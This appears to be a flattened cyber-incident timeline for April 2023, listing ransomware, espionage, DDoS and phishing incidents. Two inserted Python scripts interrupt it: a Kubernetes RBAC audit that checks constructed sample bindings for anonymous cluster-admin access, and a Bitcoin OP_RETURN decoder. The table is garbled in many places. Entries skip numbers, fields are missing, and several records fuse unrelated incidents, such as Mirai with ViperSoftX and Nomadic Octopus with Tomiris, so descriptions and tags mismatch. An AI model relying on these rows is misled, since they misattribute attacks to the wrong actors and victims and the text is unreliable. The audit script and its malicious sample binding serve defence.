Indian start-up furniture rental platform RentoMojo discloses a data breach impacting over 150,000 subscribers.
Unknown
Wholesale and retail
Cyber Crime
IN
RentoMojo, Shiny Hunters
69
20/04/2023
During 2022
During August 2022
Fakecalls
Android users in South Korea
Researchers from McAfee discover a new Fakecalls campaign using legitimate app signing keys to evade signature-based detection techniques.
Malware
Individual
Cyber Crime
KR
McAfee, Fakecalls, Android
70
20/04/2023
Since at least 20/04/2023
20/04/2023
?
Nordea Bank customers
Researchers from Heimdal discover a smishing campaign against Nordea Bank customers.
Account Takeover
Finance and insurance
Cyber Crime
NO
Heimdal, Nordea Bank
71
20/04/2023
-
-
?
Multiple organizations
Researchers from Avanan discover a phishing campaign hosting the malicious pages on Linktree, a social media reference platform.
Account Takeover
Multiple Industries
Cyber Crime
>1
Avanan, Linktree
72
20/04/2023
-
-
Killnet
Individuals with ties to NATO
The pro-Russian hacktivist group KillNet leaks stolen data allegedly belonging to around 5,000 individuals with ties to NATO.
Unknown
Unknown
Hacktivism
>1
Killnet, Russia, NATO
73
21/04/2023
'Recently'
'Recently'
?
Misconfigured Kubernetes clusters
Researchers from Aqua Security discover 'RBAC Buster', a campaign exploiting RBAC (Role-Based Access Control) to create persistent backdoor accounts on Kubernetes clusters and hijack their resources for Monero crypto-mining.
Misconfiguration
Multiple Industries
Cyber Crime
>1
Aqua Security, RBAC Buster, RBAC, Role-Based Access Control, Kubernetes, Monero
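What makes this campaign cheap to detect is that the attacker's persistence is itself an RBAC object: a ClusterRoleBinding that hands cluster-admin to a service account nobody provisioned, created through an API server that let anonymous callers do far more than the defaults allow. The script below is an added example (not Aqua Security's or the Kubernetes project's code) that audits the output of `kubectl get clusterrolebindings -o json` for both conditions; the sample listing is constructed, and the `kube-controller` service account in it is a made-up lookalike name, not a real system component. The allow-lists (`ADMIN_ROLES`, `EXPECTED_ADMIN_SAS`, `DEFAULT_PUBLIC_BINDINGS`) are assumptions to be filled in per cluster.

```python
"""Audit ClusterRoleBindings for anonymous access and unexpected cluster-admins.

Added example, not Aqua's or Kubernetes' code. Input is the JSON that
`kubectl get clusterrolebindings -o json` prints; the sample is constructed.
"""
from __future__ import annotations
import json

# Subjects that should never hold anything beyond the bindings Kubernetes ships with.
ANONYMOUS_SUBJECTS = {("User", "system:anonymous"), ("Group", "system:unauthenticated")}
# Default binding that legitimately targets unauthenticated callers (healthz/version endpoints).
DEFAULT_PUBLIC_BINDINGS = {"system:public-info-viewer"}
# Assumption: roles that amount to owning the cluster (add custom roles granting '*' on '*').
ADMIN_ROLES = {"cluster-admin"}
# Assumption: service accounts expected to hold an admin role, as (namespace, name).
EXPECTED_ADMIN_SAS = {("kube-system", "platform-operator")}


def risky_bindings(crb_list: dict) -> list[dict]:
    """Return one finding per subject that exposes the cluster to takeover."""
    findings = []
    for item in crb_list.get("items", []):
        binding = item["metadata"]["name"]
        role = item["roleRef"]["name"]
        for subj in item.get("subjects") or []:
            kind, name, ns = subj.get("kind"), subj.get("name"), subj.get("namespace", "")
            if (kind, name) in ANONYMOUS_SUBJECTS and binding not in DEFAULT_PUBLIC_BINDINGS:
                findings.append({"binding": binding, "role": role, "subject": f"{kind}:{name}",
                                 "reason": "unauthenticated caller bound outside the default public binding"})
            elif role in ADMIN_ROLES and kind == "ServiceAccount" and (ns, name) not in EXPECTED_ADMIN_SAS:
                findings.append({"binding": binding, "role": role, "subject": f"ServiceAccount:{ns}/{name}",
                                 "reason": "unexpected service account holds an admin role"})
    return findings


# Constructed listing: two default bindings, one sanctioned operator, and two
# findings (anonymous cluster-admin, plus a lookalike service account).
SAMPLE_CRBS = json.loads("""
{"items": [
 {"metadata": {"name": "cluster-admin"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "Group", "name": "system:masters"}]},
 {"metadata": {"name": "system:public-info-viewer"},
  "roleRef": {"kind": "ClusterRole", "name": "system:public-info-viewer"},
  "subjects": [{"kind": "Group", "name": "system:authenticated"},
               {"kind": "Group", "name": "system:unauthenticated"}]},
 {"metadata": {"name": "platform-operator"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "ServiceAccount", "name": "platform-operator", "namespace": "kube-system"}]},
 {"metadata": {"name": "anonymous-admin"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "User", "name": "system:anonymous"}]},
 {"metadata": {"name": "system:controller:kube-controller"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "ServiceAccount", "name": "kube-controller", "namespace": "kube-system"}]}
]}
""")

if __name__ == "__main__":
    import sys
    data = SAMPLE_CRBS if sys.stdin.isatty() else json.load(sys.stdin)
    for f in risky_bindings(data):
        print(f"{f['binding']} -> {f['role']} for {f['subject']}: {f['reason']}")
```

Run it as `kubectl get clusterrolebindings -o json | python3 rbac_audit.py`. The listing only tells you what anonymous callers are bound to; whether they can reach the API at all is a separate setting, and an API server that does not need unauthenticated access should run with `--anonymous-auth=false` so the question never arises.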
74
21/04/2023
-
-
Lazarus Group (AKA Labyrinth Chollima, Covellite, UNC4034, Zinc, Nickel Academy)
Several critical infrastructure organizations in the United States and Europe
Researchers from Symantec/Broadcom reveal that the software supply chain attack that led to last month's 3CX breach has also impacted at least several critical infrastructure organizations in the United States and Europe.
Targeted Attack
Electricity, gas steam, air conditioning
Cyber Espionage
US
EU
Symantec, Broadcom, 3CX
75
21/04/2023
'Recently'
'Recently'
BlueNoroff
Multiple organizations
Researchers from Jamf observe the North Korea-linked BlueNoroff threat group using a new macOS malware family dubbed RustBucket.
Malware
Multiple Industries
Cyber Espionage
>1
Jamf, BlueNoroff, macOS, RustBucket
76
21/04/2023
'Recently'
'Recently'
8220
Korean energy-related companies
Researchers from AhnLab discover a new campaign of the 8220 Gang exploiting the Log4Shell vulnerability to install CoinMiner on VMware Horizon servers.
77
Albertsons Companies files a notice of data breach after learning that confidential information belonging to certain individuals was accessed by an unauthorized party following a malware attack.
Malware
Wholesale and retail
Cyber Crime
US
Albertsons Companies
78
21/04/2023
Between 17/02/2023 and 23/02/2023
21/02/2023
?
Robeson Health Care Corporation
Robeson Health Care Corporation files a notice of data breach after learning that confidential patient data was accessed by an unauthorized party following a malware attack.
Malware
Human health and social work
Cyber Crime
US
Robeson Health Care Corporation
79
21/04/2023
-
-
ALPHV AKA BlackCat
Saville Row
Saville Row, a Chilean clothing store, is added to BlackCat’s ransomware leak site.
Malware
Wholesale and retail
Cyber Crime
CL
ALPHV, BlackCat, Saville Row, ransomware
80
21/04/2023
-
-
ALPHV AKA BlackCat
Seguros la Occidental
Seguros la Occidental, a Venezuelan insurer that offers general and life insurance products, is added to BlackCat’s ransomware leak site with samples containing 27 screenshots of images of various insurance company documents that included ID cards.
Malware
Finance and insurance
Cyber Crime
VE
ALPHV, BlackCat, Seguros la Occidental, ransomware
81
21/04/2023
-
-
ALPHV AKA BlackCat
Cementos Progreso
Cementos Progreso is added to BlackCat’s ransomware leak site. As proof, they offer some samples with internal documents.
Malware
Professional, scientific and technical
Cyber Crime
GT
ALPHV AKA BlackCat, ransomware, Cementos Progreso
82
22/04/2023
-
-
?
Vopak
Vopak, a tank storage company known for its storage of fossil fuels, is the victim of a ransomware attack.
Malware
Transportation and storage
Cyber Crime
NL
Vopak, ransomware
83
22/04/2023
-
-
Cl0p AKA Clop
Allied Benefit
The Cl0p ransomware gang leaks some data from Allied Benefit, allegedly exfiltrated by exploiting the CVE-2023-0669 Fortra GoAnywhere MFT vulnerability.
The Cl0p ransomware gang claims to have hacked Tropical Texas Behavioral Health, allegedly exfiltrating data by exploiting the CVE-2023-0669 Fortra GoAnywhere MFT vulnerability.
The Cl0p ransomware gang claims to have hacked Alivia Health in Puerto Rico, allegedly exfiltrating data by exploiting the CVE-2023-0669 Fortra GoAnywhere MFT vulnerability.
The Cl0p ransomware gang claims to have hacked ITx, a revenue management company, allegedly exfiltrating data by exploiting the CVE-2023-0669 Fortra GoAnywhere MFT vulnerability.
90
Trust Wallet discloses that it has patched a security vulnerability that had led to its users losing nearly $170,000.
Vulnerability
Fintech
Cyber Crime
N/A
Trust Wallet
91
23/04/2023
27/03/2023
23/04/2023
BianLian and RansomHouse
Albany ENT & Allergy Services
Both BianLian and RansomHouse ransomware gangs list Albany ENT & Allergy Services in their leak site.
Malware
Human health and social work
Cyber Crime
US
BianLian, RansomHouse, ransomware, Albany ENT & Allergy Services
92
23/04/2023
-
-
ALPHV AKA BlackCat
Naivas
Kenya’s Naivas supermarket chain is the victim of a BlackCat ransomware incident.
Malware
Wholesale and retail
Cyber Crime
KE
ALPHV, BlackCat, Naivas, ransomware
93
23/04/2023
During February 2023
23/04/2023
?
Terravision
The airport transfer service Terravision suffers a data breach exposing over 2M customer records, including names, phone numbers, email addresses, salted password hashes and, in some cases, date of birth and country of origin.
Unknown
Transportation and storage
Cyber Crime
IT
Terravision
94
24/04/2023
-
22/04/2023
Black Basta
Yellow Pages Canada
Yellow Pages Canada, a Canadian directory publisher confirms to have been hit by a cyber attack. The Black Basta ransomware and extortion gang claims responsibility for the attack and posts sensitive documents and data over the weekend.
Malware
Administration and support service
Cyber Crime
CA
Yellow Pages Canada, Black Basta, ransomware
95
24/04/2023
24/04/2023
24/04/2023
?
KuCoin's Twitter account
The cryptocurrency exchange KuCoin's Twitter account is hacked, allowing attackers to promote a fake giveaway scam that led to the theft of over $22.6K in cryptocurrency.
Account Takeover
Fintech
Cyber Crime
N/A
KuCoin, Twitter
96
24/04/2023
Since at least mid-April 2023
mid-April 2023
?
Multiple organizations
The Mirai malware botnet is actively exploiting a TP-Link Archer A21 (AX1800) WiFi router vulnerability tracked as CVE-2023-1389 to incorporate devices into DDoS (distributed denial of service) swarms.
Researchers from Trend Micro discover a new version of the ViperSoftX information-stealing malware with a broader range of targets, including targeting the KeePass and 1Password password managers.
Malware
Multiple Industries
Cyber Crime
>1
Trend Micro, ViperSoftX, KeePass, 1Password
98
24/04/2023
-
-
?
Unknown organization(s)
The Cybersecurity and Infrastructure Security Agency (CISA) adds CVE-2023-28432, an information disclosure vulnerability in the MinIO object storage server, which is widely used for machine learning, analytics and more, to its catalog of known exploited vulnerabilities.
CVE-2023-28432 Vulnerability
Unknown
N/A
US
Cybersecurity and Infrastructure Security Agency, CISA, CVE-2023-28432, MinIO
99
24/04/2023
During 2020 elections
During 2020 elections
Pioneer Kitten
Undisclosed U.S. city's local infrastructure
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF) reveal that during the elections of 2020, Pioneer Kitten, an Iran-linked hacking group, had “gained access to a city's local infrastructure that would be used to record the results of voting for the 2020 elections.”
Unknown
Public admin and defence, social security
Cyber Espionage
US
Cybersecurity and Infrastructure Security Agency, CISA, Cyber National Mission Force, CNMF, Pioneer Kitten, Iran, 2020 elections
100
24/04/2023
'Recently'
'Recently'
Foreign-based cybercriminals
Three U.S. civilian federal agencies
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reveals that it had “recently” detected three civilian federal agencies “facing an intrusion campaign from foreign-based cybercriminals.”
Unknown
Public admin and defence, social security
N/A
US
Cybersecurity and Infrastructure Security Agency, CISA
101
24/04/2023
Since 2020
-
Nomadic Octopus AKA DustSquad
Tajikistan’s high ranking government officials, public service infrastructures, and telecoms services
Researchers from Prodaft reveal the details of Paperbug, a campaign in which the Russian espionage group tracked as Nomadic Octopus has been observed spying on Tajikistan's high-ranking government officials, public service infrastructure and telecom services, likely by infiltrating a mobile phone carrier.
Researchers from Kaspersky reveal the details of Tomiris, a Russian threat actor focusing on intelligence gathering in Central Asia and using KopiLuwak and TunnusSched, tools borrowed from the Turla APT group.
Targeted Attack
Multiple Industries
Cyber Espionage
>1
Kaspersky, Tomiris, Turla, KopiLuwak, TunnusSched
103
24/04/2023
'Recently'
'Recently'
DoNot APT
Individual residing in Kashmir
Researchers from Cyfirma discover a new campaign by the DoNot APT group targeting individuals residing in Kashmir with two malware strains delivered via fake WhatsApp applications.
Targeted Attack
Individual
Cyber Espionage
IN
Cyfirma, DoNot APT, Kashmir, WhatsApp
104
24/04/2023
Since at least the beginning of March 2023
During March 2023
?
Multiple organizations
Researchers from ReversingLabs discover a new campaign pushing malware on the Python Package Index (PyPI) under the guise of termcolour, a legitimate yet abandoned open source module.
Malware
Multiple Industries
Cyber Crime
>1
ReversingLabs, Python Package Index, PyPI
105
24/04/2023
-
-
?
Individuals
Researchers from Malwarebytes discover a malvertising scheme leading to clickjacking.
Malvertising
Individual
Cyber Crime
>1
Malwarebytes
106
24/04/2023
24/04/2023
24/04/2023
Sharpboys
ATID Group (Academy for Torah Initiatives and Directions)
A threat actor dubbed Sharpboys leaks tens of thousands of records from Israel's ATID Group.
Unknown
Education
Hacktivism
IL
ATID Group, Academy for Torah Initiatives and Directions, Sharpboys
107
24/04/2023
Early April 2023
Early April 2023
Gh0st RAT
Undisclosed healthcare organization
Researchers from Cofense reveal that Gh0st RAT, a decades-old open-source remote administration tool (RAT), recently appeared in phishing campaigns targeting a healthcare organization.
Malware
Human health and social work
Cyber Espionage
N/A
Cofense, Gh0st RAT
108
24/04/2023
'Recently'
'Recently'
?
CIC Group
CIC Group files a notice of data breach after learning that confidential consumer information that had been entrusted to the company was subject to unauthorized access.
Unknown
Other service activities
Cyber Crime
US
CIC Group
109
24/04/2023
-
-
?
Livingston International
Livingston International files a notice of data breach after determining that confidential consumer information that had been entrusted to the company was subject to unauthorized access.
Unknown
Professional, scientific and technical
Cyber Crime
US
Livingston International
110
24/04/2023
-
-
?
Elk Grove Unified School District
The Elk Grove Unified School District confirms it is investigating tax filing issues for some of its employees.
Unknown
Education
Cyber Crime
US
Elk Grove Unified School District
111
24/04/2023
24/04/2023
24/04/2023
?
UniSat Wallet
UniSat Wallet experiences a large number of double-spend attacks due to a vulnerability in the codebase.
Vulnerability
Fintech
Cyber Crime
N/A
UniSat Wallet
112
24/04/2023
-
-
LockBit
Fullerton India
The LockBit ransomware claims to have hit Indian non-bank lender Fullerton India and threatens to dump more than 600 gigabytes of financial data unless it receives a $3 million extortion payment.
Malware
Finance and insurance
Cyber Crime
IN
Fullerton India, ransomware, LockBit
113
25/04/2023
-
-
LOBSHOT
Multiple organizations
Researchers from Elastic discover a new malware known as ‘LOBSHOT’ distributed using Google ads, and allowing threat actors to stealthily take over infected Windows devices using hVNC.
Malware
Multiple Industries
Cyber Crime
>1
Elastic, LOBSHOT, Google ads, hVNC
114
25/04/2023
24/04/2023
24/04/2023
Play
City of Lowell
The City of Lowell announces that it has been hit by a ransomware attack. The Play ransomware gang claims responsibility for the attack.
Malware
Public admin and defence, social security
Cyber Crime
US
City of Lowell, Play, ransomware
115
25/04/2023
Since February 2023
Between February and March 2023
?
Facebook users
Researchers from Group-IB discover a new and still ongoing phishing scheme aimed at Facebook users that sees threat actors attempt to steal account credentials and take over profiles, carried out via 3,200 fake profiles.
Account Takeover
Individual
Cyber Crime
>1
Group-IB, Facebook, Meta
116
25/04/2023
-
-
Educated Manticore
Individuals in Israel
Researchers from Check Point reveal the details of Educated Manticore, a new Iranian-aligned threat actor targeting individuals in Israel with new tactics and tools, including a new version of PowerLess, an implant previously attributed to the Phosphorus threat actor.
Targeted Attack
Individual
Cyber Espionage
IL
Check Point, Educated Manticore, PowerLess, Phosphorus
117
25/04/2023
From December 2022 through March 2023
-
FIN6
Organizations in the financial sector
Researchers from Securonix discover a new attack campaign dubbed OCX#HARVESTER distributing the More_eggs backdoor, along with other malicious payloads.
Malware
Finance and insurance
Cyber Crime
>1
FIN6, OCX#HARVESTER, More_eggs
118
25/04/2023
-
-
?
Multiple organizations in Italy
Researchers from Malwarebytes discover a new campaign distributing GuLoader via a fake shipment notification email delivering a malicious ISO file.
Malware
Multiple Industries
Cyber Crime
IT
Malwarebytes, GuLoader
119
25/04/2023
-
-
?
Unknown organization in China
Unknown threat actors post a massive data set on a Russian forum, allegedly offering for sale the sensitive details of over 630 million users from China.
Unknown
Unknown
Cyber Crime
CN
China
120
25/04/2023
15/02/2023
03/03/2023
?
StaffScapes
StaffScapes, a Colorado-based human resources services company, discloses that an unauthorized party gained access to its environments following an e-mail compromise.
Account Takeover
Professional, scientific and technical
Cyber Crime
US
StaffScapes
121
25/04/2023
-
-
?
Multimedica
Multimedica is hit with a ransomware attack and several hospitals in Italy cannot provide services to their patients.
Malware
Human health and social work
Cyber Crime
IT
Multimedica, ransomware
122
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Official personal website of Israel's Prime Minister Benjamin Netanyahu
The official personal website of Israel's Prime Minister Benjamin Netanyahu is briefly taken down by a DDoS attack.
DDoS
Individual
Hacktivism
IL
Anonymous Sudan, Benjamin Netanyahu
123
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Multiple targets in Israel including the websites of Haifa Port and the Israel Ports Development company
Anonymous Sudan is thought to be behind other attacks against multiple Israeli targets.
DDoS
Transportation and storage
Hacktivism
IL
Anonymous Sudan, Haifa Port, Israel Ports Development
124
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
National Insurance Institute
Anonymous Sudan claims to have taken down the website of Israel's National Insurance Institute.
DDoS
Public admin and defence, social security
Hacktivism
IL
Anonymous Sudan, Israel National Insurance Institute
125
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Israel's spy agency Mossad
Anonymous Sudan claims to have taken down the website of Israel's spy agency Mossad.
DDoS
Public admin and defence, social security
Hacktivism
IL
Anonymous Sudan, Mossad
126
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Maariv
Anonymous Sudan takes down the website of the major Israeli news outlet Maariv.
DDoS
Information and communication
Hacktivism
IL
Anonymous Sudan, Maariv
127
26/04/2023
'Recently'
'Recently'
Alloy Taurus (aka GALLIUM, Softcell)
Organizations in South Africa and Nepal.
Researchers from Palo Alto Networks reveal that the Chinese threat actors from Alloy Taurus are deploying new Linux malware variants in cyber espionage attacks, such as a new PingPull variant and a previously undocumented backdoor tracked as 'Sword2033.'
Researchers from ESET uncover a campaign by the APT group known as Evasive Panda targeting an International NGO in China with malware delivered through updates of the popular Tencent QQ Chinese software.
Researchers from Trellix and Cyble discover a new macOS information-stealing malware named 'Atomic' (aka 'AMOS') sold to cybercriminals via private Telegram channels for a subscription of $1,000 per month.
Malware
Multiple Industries
Cyber Crime
>1
Trellix, Cyble, Atomic, AMOS, Telegram
130
26/04/2023
-
-
Read The Manual (RTM) Locker
Multiple organizations
Researchers from Uptycs discover a Linux variant of the RTM Locker ransomware targeting ESXi servers and based on the leaked source code of the now-defunct Babuk ransomware.
Malware
Multiple Industries
Cyber Crime
>1
Read The Manual, RTM Locker, Uptycs, Linux, Babuk, ransomware, ESXi
131
26/04/2023
-
-
?
Android users
Researchers from McAfee discover a set of 38 Minecraft copycat games on Google Play, downloaded by roughly 35 million Android users, that infect devices with the Android adware 'HiddenAds', which stealthily loads ads in the background to generate revenue for its operators.
Malware
Individual
Cyber Crime
CA
BR
KR
US
McAfee, Google Play, Android, HiddenAds
132
26/04/2023
Since at least 28/03/2023
28/03/2023
FIN7
Vulnerable Veeam backup servers
Researchers from WithSecure discover a campaign by the FIN7 criminal group exploiting the Veeam Backup & Replication vulnerability CVE-2023-27532 to install the DiceLoader/Lizar backdoor.
Truman State University in Kirksville, Missouri says it is in the process of recovering from a “cybersecurity virus attack” that forced it to shut down the campus network and order all school-issued devices to be turned off.
Unknown
Education
Cyber Crime
US
Truman State University
134
26/04/2023
'Recently'
'Recently'
APT35 AKA Mint Sandstorm or Charming Kitten
Organizations in the U.S., Europe, India, Turkey and other countries
Researchers from Bitdefender reveal that the Iranian state-sponsored group APT35 (aka Mint Sandstorm or Charming Kitten) is deploying a new strain of malware named BellaCiao against several victims in the U.S., Europe, India, Turkey and other countries.
Targeted Attack
Multiple Industries
Cyber Espionage
US
IN
TR
APT35, Mint Sandstorm, Charming Kitten, BellaCiao, Bitdefender
135
26/04/2023
-
-
LockBit 3.0
Keystone SMILES Community Learning Center
The LockBit ransomware gang apologizes for breaching Keystone SMILES Community Learning Center, a nonprofit preschool organization.
Malware
Human health and social work
Cyber Crime
US
LockBit, LockBit 3.0, Keystone SMILES Community Learning Center
136
26/04/2023
Since at least early April 2023
During early April 2023
?
AT&T users
Unknown hackers are breaking into the accounts of people who have AT&T email addresses, and are using that access to then break into the victims' cryptocurrency exchange accounts and steal their crypto.
Account Takeover
Fintech
Cyber Crime
US
AT&T
137
26/04/2023
Since at least January 2023
Since at least January 2023
Vietnamese threat actors
Facebook users in USA, Canada, England and Australia
Researchers from Guardio Labs discover a ‘malverposting’ campaign linked to a Vietnamese threat actor ongoing for months and estimated to have infected over 500,000 devices worldwide in the past three months alone.
Malverposting
Individual
Cyber Crime
AU
CA
UK
US
Guardio Labs, Facebook, Vietnam
138
26/04/2023
26/04/2023
26/04/2023
?
Facebook account of Israel's Prime Minister Benjamin Netanyahu
The Facebook account of Israel's Prime Minister is hijacked (albeit briefly) by unauthorised parties who manage to update it with a video of prayers at a mosque, accompanied by Arabic verses from the Quran.
Account Takeover
Individual
Hacktivism
IL
Facebook, Quran, Benjamin Netanyahu
139
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Multiple websites in Israel
Anonymous Sudan claims to have taken down multiple websites in Israel, including the official government website of Israel, the Israeli Police, the Israel Broadcasting Corporation, at least seven financial institutions, five healthcare facilities, four universities, nine utilities and telecommunications companies, three Israeli airlines, and one airport.
DDoS
Multiple Industries
Hacktivism
IL
Anonymous Sudan
140
26/04/2023
During April 2023
During April 2023
Tonto Team
Korean education, construction, diplomatic, and political institutions
Researchers from AhnLab discover a new campaign carried out by the Chinese Tonto Team threat actor using a file related to anti-malware products to execute their malicious attacks.
Targeted Attack
Multiple Industries
Cyber Espionage
KR
Tonto Team, China, AhnLab
141
26/04/2023
26/04/2023
26/04/2023
?
Merlin
Decentralized crypto exchange Merlin suffers a nearly $2 million rug pull.
Rug Pull
Fintech
Cyber Crime
N/A
Merlin
142
26/04/2023
19/07/2022
19/07/2022
?
NYSARC Columbia County Chapter (COARC)
NYSARC Columbia County Chapter (COARC) confirms that they experienced a ransomware attack in July 2022.
Malware
Human health and social work
Cyber Crime
US
NYSARC Columbia County Chapter, COARC, ransomware
143
26/04/2023
During September 2022
23/03/2023
?
Astral Brands
Astral Brands, a beauty product company is breached in a cyberattack, exposing the financial data of hundreds of customers.
Unknown
Wholesale and retail
Cyber Crime
US
Astral Brands
144
26/04/2023
-
-
Undisclosed Ukrainian man
Individuals in Eastern Europe
The Cyber Police of Ukraine arrests a man for selling, through closed Telegram groups and channels, the stolen personal data of more than 300 million individuals. The stolen information includes Ukrainian and European passport, taxpayer and driver's license numbers, as well as bank account data and birth certificates.
Account Takeover
Individual
Cyber Crime
>1
Ukraine
145
27/04/2023
-
-
?
Online stores
Researchers from Malwarebytes discover that MageCart skimmers are now hijacking legitimate online stores' payment pages to show their own fake payment forms as modals in order to steal customers' credit cards.
Malicious Script Injection
Wholesale and retail
Cyber Crime
>1
Malwarebytes, MageCart
146
27/04/2023
Since 2020
Since 2020
Iranian Government
Minority groups in Iran
Researchers from Lookout discover BouldSpy, an Android spyware used by the Iranian government to surveil minority groups in the country and monitor arms, alcohol, and drugs trafficking.
Malware
Individual
Cyber Espionage
IR
BouldSpy, Lookout, Android
147
27/04/2023
-
-
?
CityJerks[.]com
Attackers steal email addresses, direct messages, and other personal data from users of CityJerks[.]com, a dating website.
Unknown
Arts entertainment, recreation
Cyber Crime
US
CityJerks[.]com
148
27/04/2023
-
-
?
TruckerSucker[.]com
Attackers steal email addresses, direct messages, and other personal data from users of TruckerSucker[.]com, a dating website.
Unknown
Arts entertainment, recreation
Cyber Crime
US
TruckerSucker[.]com
149
27/04/2023
-
-
?
Hardenhuish School
Hardenhuish School, a secondary school in the UK, confirms it has been the victim of a ransomware attack which has affected its IT network.
Malware
Education
Cyber Crime
UK
Hardenhuish School, ransomware
150
27/04/2023
-
-
?
Russian Foreign Military Intelligence Agency (GRU), Foreign Intelligence Service (SVR), and Federal Security Service (FSB)
Using OP_RETURN messages, a mysterious bitcoiner flags 986 wallets as controlled by Russia's Foreign Military Intelligence Agency (GRU), Foreign Intelligence Service (SVR), and Federal Security Service (FSB), and transfers the stolen bitcoins to addresses associated with Ukrainian volunteers.
Vulnerability
Professional, scientific and technical
Hacktivism
RU
OP_RETURN, Foreign Military Intelligence Agency, GRU, Foreign Intelligence Service, SVR, Federal Security Service, FSB, Russia, Ukraine
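The entry above (record 150) hinges on OP_RETURN, the Bitcoin Script opcode that makes an output provably unspendable and lets its script carry a short arbitrary payload, which is how on-chain "labels" for a set of wallets get published. The following is an added example, written for this timeline and not the vigilante's tooling: it encodes and decodes single-push OP_RETURN output scripts and scans a constructed list of transaction outputs for embedded messages. The constants follow Bitcoin Core's script rules; the 80-byte limit is default relay policy, not consensus.

```python
"""Encode and decode Bitcoin OP_RETURN (null-data) output scripts.

Added example; not code from the original timeline or from the bitcoiner
described there. Script layout:
    OP_RETURN <push opcode> <payload>
Push-opcode encoding by payload length n:
    1..75      -> a single length byte
    76..255    -> OP_PUSHDATA1 (0x4c) + 1-byte length
    256..65535 -> OP_PUSHDATA2 (0x4d) + 2-byte little-endian length
Bitcoin Core's default relay policy accepts at most 80 payload bytes; that is
policy, not consensus (consensus caps any single pushed element at 520 bytes).
"""
from typing import List, Optional

OP_RETURN = 0x6A
OP_PUSHDATA1 = 0x4C
OP_PUSHDATA2 = 0x4D
STANDARD_MAX_PAYLOAD = 80   # bitcoind -datacarriersize default
MAX_PUSH = 520              # MAX_SCRIPT_ELEMENT_SIZE (consensus)


def encode_op_return(payload: bytes) -> bytes:
    """Build the scriptPubKey for an OP_RETURN output carrying `payload`."""
    n = len(payload)
    if n == 0:
        return bytes([OP_RETURN])          # bare OP_RETURN, no data
    if n > MAX_PUSH:
        raise ValueError(f"payload of {n} bytes exceeds the 520-byte push limit")
    if n <= 75:
        push = bytes([n])
    elif n <= 255:
        push = bytes([OP_PUSHDATA1, n])
    else:
        push = bytes([OP_PUSHDATA2]) + n.to_bytes(2, "little")
    return bytes([OP_RETURN]) + push + payload


def decode_op_return(script: bytes) -> Optional[bytes]:
    """Return the payload if `script` is a well-formed single-push OP_RETURN
    script, else None. A truncated push or trailing junk yields None rather
    than a partial payload, so a caller never acts on a cut-off message."""
    if not script or script[0] != OP_RETURN:
        return None
    if len(script) == 1:
        return b""
    op, i = script[1], 2
    if 1 <= op <= 75:
        n = op
    elif op == OP_PUSHDATA1 and len(script) >= i + 1:
        n, i = script[i], i + 1
    elif op == OP_PUSHDATA2 and len(script) >= i + 2:
        n, i = int.from_bytes(script[i:i + 2], "little"), i + 2
    else:
        return None   # OP_0, OP_1..OP_16, PUSHDATA4 and multi-push scripts not handled
    payload = script[i:i + n]
    if len(payload) != n or i + n != len(script):
        return None   # truncated payload or trailing bytes
    return payload


def is_standard_op_return(script: bytes) -> bool:
    """True if the script would pass default relay policy (<= 80 payload bytes)."""
    payload = decode_op_return(script)
    return payload is not None and len(payload) <= STANDARD_MAX_PAYLOAD


def extract_messages(script_pubkeys: List[bytes]) -> List[str]:
    """Scan a transaction's output scripts and return the UTF-8 messages found
    in OP_RETURN outputs; non-text payloads come back as hex strings."""
    messages = []
    for spk in script_pubkeys:
        payload = decode_op_return(spk)
        if payload is None:
            continue
        try:
            messages.append(payload.decode("utf-8"))
        except UnicodeDecodeError:
            messages.append(payload.hex())
    return messages


if __name__ == "__main__":
    # Constructed outputs: a P2PKH payment, an OP_RETURN note, a P2WPKH change
    # output. Only the OP_RETURN output carries a message.
    outputs = [
        bytes.fromhex("76a914" + "00" * 20 + "88ac"),
        encode_op_return(b"wallet flagged: example label"),
        bytes.fromhex("0014" + "11" * 20),
    ]
    print(extract_messages(outputs))
```

When walking real transaction data, feed every output's scriptPubKey to extract_messages and keep the transaction's input addresses alongside the message: the message only says what the sender claims, while the inputs prove which keys the sender could actually spend from.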
151
27/04/2023
-
-
Avos Locker
Emmanuel College
Emmanuel College in Boston appears to have become a victim of the Avos Locker ransomware. The college was added to the threat actor's leak site the previous day, with the attackers claiming to have exfiltrated 140 GB of data.
Malware
Education
Cyber Crime
US
Emmanuel College, ransomware, Avos Locker
152
27/04/2023
13/03/2023
-
RansomHouse
OMT Officine Meccaniche Torino
OMT Officine Meccaniche Torino suffers a RansomHouse ransomware attack and has 200GB of data leaked.
The regional government of Friuli Venezia Giulia in Italy suffers a cyber attack.
Unknown
Public admin and defence, social security
Cyber Crime
IT
Regione Friuli Venezia Giulia
154
28/04/2023
-
-
APT28 AKA Fancy Bear
Various government bodies in Ukraine
The Computer Emergency Response Team of Ukraine (CERT-UA) reveals that Russian threat actors from APT28 are targeting various government bodies in the country with malicious emails supposedly containing instructions on how to update Windows as a defense against cyber attacks.
Targeted Attack
Public admin and defence, social security
Cyber Espionage
UA
Computer Emergency Response Team of Ukraine, CERT-UA, APT28
155
28/04/2023
25/04/2023
25/04/2023
?
Americold
Americold, a leading U.S. cold storage and logistics company, faces IT issues after its network was breached.
Unknown
Administration and support service
Cyber Crime
US
Americold
156
28/04/2023
Between February and March 2023
During March 2023
?
T-Mobile
T-Mobile discloses the second data breach of 2023 after discovering that attackers had access to the personal information of 836 customers for more than a month, starting late February 2023.
Unknown
Information and communication
Cyber Crime
US
T-Mobile
157
28/04/2023
-
-
Medusa
Alto Calore Servizi
Alto Calore Servizi, an Italian company that provides drinking water to nearly half a million people is experiencing some technical disruptions following a ransomware attack.
Malware
Water supply, waste mgmt, remediation
Cyber Crime
IT
Alto Calore Servizi, Medusa, Ransomware
158
28/04/2023
-
-
?
National Smallbore Rifle Association (NSRA)
